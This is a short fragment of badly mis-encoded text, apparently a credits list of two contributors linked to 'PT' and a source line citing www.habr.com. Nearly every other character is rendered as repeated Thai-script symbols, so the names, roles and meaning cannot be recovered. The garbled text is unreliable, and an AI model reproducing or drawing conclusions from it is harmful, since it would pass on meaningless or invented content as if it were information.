- ืื ืืื ืืืืจืื, ืจืืฉ ืืืืงืช ืฉืืจืืชื ืืืืืื, ืืจืื ืืืืืช ืืืืื PT, ืืื ืืืืืืืช ืืืืืืืช
- ืืืืจ ืคืืืืืงืื, ืืืืื, ืืจืื ืืืืืช ืืืืื PT, ืืื ืืืืืืืช ืืืืืืืช
ืืงืืจ: www.habr.com